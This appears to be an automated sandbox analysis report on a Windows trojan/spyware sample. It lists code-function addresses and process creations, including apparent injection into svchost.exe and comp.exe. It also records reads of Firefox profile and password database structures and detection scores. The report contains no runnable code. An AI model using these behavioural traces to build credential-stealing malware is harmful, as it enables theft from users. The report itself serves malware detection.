Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004185B3	2_2_004185B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004030D0	2_2_004030D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010E0	2_2_004010E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E083	2_2_0040E083
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004100A3	2_2_004100A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1C7	2_2_0040E1C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1D3	2_2_0040E1D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401240	2_2_00401240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401B47	2_2_00401B47
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401B50	2_2_00401B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EC63	2_2_0042EC63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402430	2_2_00402430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE7B	2_2_0040FE7B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE83	2_2_0040FE83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004167B3	2_2_004167B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C003E6	2_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E3F0	2_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA352	2_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC02C0	2_2_03BC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0274	2_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF41A2	2_2_03BF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C001AA	2_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF81CC	2_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDA118	2_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30100	2_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC8158	2_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD2000	2_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3C7C0	2_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40770	2_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64750	2_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5C6E0	2_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C00591	2_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEE4F6	2_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4420	2_2_03BE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF2446	2_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF6BD7	2_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFAB40	2_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0A9A6	2_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B268B8	2_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E8F0	2_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4A840	2_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B42840	2_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBEFA0	2_2_03BBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4CFE0	2_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32FC8	2_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B60F30	2_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE2F30	2_2_03BE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B82F28	2_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4F40	2_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52E90	2_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFCE93	2_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFEEDB	2_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFEE26	2_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40E59	2_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B58DBF	2_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3ADE0	2_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDCD1F	2_2_03BDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4AD00	2_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE0CB5	2_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30CF2	2_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40C00	2_2_03B40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B8739A	2_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF132D	2_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2D34C	2_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B452A0	2_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE12ED	2_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5B2C0	2_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4B1B0	2_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C0B16B	2_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2F172	2_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7516C	2_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF70E9	2_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF0E0	2_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEF0CC	2_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B470C0	2_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF7B0	2_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF16CC	2_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B85630	2_2_03B85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C095C3	2_2_03C095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDD5B0	2_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7571	2_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFF43F	2_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B31460	2_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5FB80	2_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB5BF0	2_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7DBF9	2_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFB76	2_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDDAAC	2_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B85AA0	2_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE1AA3	2_2_03BE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEDAC6	2_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB3A6C	2_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFA49	2_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7A46	2_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD5910	2_2_03BD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B49950	2_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5B950	2_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B438E0	2_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAD800	2_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFFB1	2_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B41F92	2_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B03FD2	2_2_03B03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B03FD5	2_2_03B03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFF09	2_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B49EB0	2_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5FDC0	2_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF7D73	2_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF1D5A	2_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B43D40	2_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFFCF2	2_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB9C32	2_2_03BB9C32
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_03155380	4_2_03155380
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_031348F0	4_2_031348F0
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_031347A0	4_2_031347A0
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_031367C0	4_2_031367C0
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_0313CED0	4_2_0313CED0
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_03136598	4_2_03136598
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Code function: 4_2_031365A0	4_2_031365A0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DC02C0	5_2_02DC02C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DE0274	5_2_02DE0274
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02E003E6	5_2_02E003E6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D4E3F0	5_2_02D4E3F0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFA352	5_2_02DFA352
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DD2000	5_2_02DD2000
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF81CC	5_2_02DF81CC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02E001AA	5_2_02E001AA
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF41A2	5_2_02DF41A2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DC8158	5_2_02DC8158
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DDA118	5_2_02DDA118
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D30100	5_2_02D30100
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D5C6E0	5_2_02D5C6E0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D3C7C0	5_2_02D3C7C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D64750	5_2_02D64750
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D40770	5_2_02D40770
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DEE4F6	5_2_02DEE4F6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF2446	5_2_02DF2446
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DE4420	5_2_02DE4420
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02E00591	5_2_02E00591
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D40535	5_2_02D40535
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D3EA80	5_2_02D3EA80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF6BD7	5_2_02DF6BD7
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFAB40	5_2_02DFAB40
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D6E8F0	5_2_02D6E8F0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D268B8	5_2_02D268B8
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D4A840	5_2_02D4A840
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D42840	5_2_02D42840
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02E0A9A6	5_2_02E0A9A6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D429A0	5_2_02D429A0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D56962	5_2_02D56962
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFEEDB	5_2_02DFEEDB
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D52E90	5_2_02D52E90
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFCE93	5_2_02DFCE93
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D40E59	5_2_02D40E59
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFEE26	5_2_02DFEE26
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D32FC8	5_2_02D32FC8
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D4CFE0	5_2_02D4CFE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DBEFA0	5_2_02DBEFA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DB4F40	5_2_02DB4F40
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D60F30	5_2_02D60F30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DE2F30	5_2_02DE2F30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D82F28	5_2_02D82F28
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D30CF2	5_2_02D30CF2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DE0CB5	5_2_02DE0CB5
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D40C00	5_2_02D40C00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D3ADE0	5_2_02D3ADE0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D58DBF	5_2_02D58DBF
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DDCD1F	5_2_02DDCD1F
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D4AD00	5_2_02D4AD00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D5B2C0	5_2_02D5B2C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DE12ED	5_2_02DE12ED
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D452A0	5_2_02D452A0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D8739A	5_2_02D8739A
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D2D34C	5_2_02D2D34C
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF132D	5_2_02DF132D
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DEF0CC	5_2_02DEF0CC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D470C0	5_2_02D470C0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF70E9	5_2_02DF70E9
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFF0E0	5_2_02DFF0E0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D4B1B0	5_2_02D4B1B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02E0B16B	5_2_02E0B16B
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D2F172	5_2_02D2F172
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D7516C	5_2_02D7516C
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF16CC	5_2_02DF16CC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D85630	5_2_02D85630
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFF7B0	5_2_02DFF7B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D31460	5_2_02D31460
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFF43F	5_2_02DFF43F
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02E095C3	5_2_02E095C3
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DDD5B0	5_2_02DDD5B0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF7571	5_2_02DF7571
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DEDAC6	5_2_02DEDAC6
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DDDAAC	5_2_02DDDAAC
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D85AA0	5_2_02D85AA0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DE1AA3	5_2_02DE1AA3
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFFA49	5_2_02DFFA49
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF7A46	5_2_02DF7A46
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DB3A6C	5_2_02DB3A6C
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DB5BF0	5_2_02DB5BF0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D7DBF9	5_2_02D7DBF9
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D5FB80	5_2_02D5FB80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFFB76	5_2_02DFFB76
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D438E0	5_2_02D438E0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DAD800	5_2_02DAD800
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D49950	5_2_02D49950
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D5B950	5_2_02D5B950
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DD5910	5_2_02DD5910
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D49EB0	5_2_02D49EB0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D03FD2	5_2_02D03FD2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D03FD5	5_2_02D03FD5
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D41F92	5_2_02D41F92
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFFFB1	5_2_02DFFFB1
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFFF09	5_2_02DFFF09
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DFFCF2	5_2_02DFFCF2
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DB9C32	5_2_02DB9C32
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D5FDC0	5_2_02D5FDC0
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF1D5A	5_2_02DF1D5A
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02D43D40	5_2_02D43D40
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_02DF7D73	5_2_02DF7D73
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001C1C00	5_2_001C1C00
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001BCB30	5_2_001BCB30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001BCB28	5_2_001BCB28
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001BAD30	5_2_001BAD30
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001BCD50	5_2_001BCD50
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001BAE74	5_2_001BAE74
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001BAE80	5_2_001BAE80
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001C5260	5_2_001C5260
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001C3460	5_2_001C3460
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_001DB910	5_2_001DB910
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_009DE465	5_2_009DE465
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_009DE583	5_2_009DE583
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_009DE6EB	5_2_009DE6EB
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_009DD9E8	5_2_009DD9E8
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_009DE91C	5_2_009DE91C
Source: C:\Windows\SysWOW64\comp.exe	Code function: 5_2_009DCC83	5_2_009DCC83

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 111 times
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: String function: 00F07DE1 appears 35 times
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: String function: 00F20AE3 appears 70 times
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: String function: 00F28900 appears 42 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 02D75130 appears 58 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 02DBF290 appears 105 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 02D2B970 appears 280 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 02D87E54 appears 111 times
Source: C:\Windows\SysWOW64\comp.exe	Code function: String function: 02DAEA12 appears 86 times

Source: EIvidclKOb.exe, 00000000.00000003.2106907929.00000000044BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs EIvidclKOb.exe
Source: EIvidclKOb.exe, 00000000.00000003.2105085162.0000000004313000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs EIvidclKOb.exe

Source: EIvidclKOb.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@8/8

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F6A06A GetLastError,FormatMessageW,

0_2_00F6A06A

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F581CB AdjustTokenPrivileges,CloseHandle,		0_2_00F581CB
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00F587E1

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00F6B3FB

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00F7EE0D

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00F783BB

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00F04E89

Source: C:\Users\user\Desktop\EIvidclKOb.exe

File created: C:\Users\user\AppData\Local\Temp\aut12AC.tmp

Jump to behavior

Source: EIvidclKOb.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: comp.exe, 00000005.00000002.3959858179.0000000000599000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000005.00000002.3959858179.0000000000564000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: EIvidclKOb.exe	Virustotal: Detection: 66%
Source: EIvidclKOb.exe	ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\EIvidclKOb.exe "C:\Users\user\Desktop\EIvidclKOb.exe"
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\EIvidclKOb.exe"
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\EIvidclKOb.exe"	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"	Jump to behavior
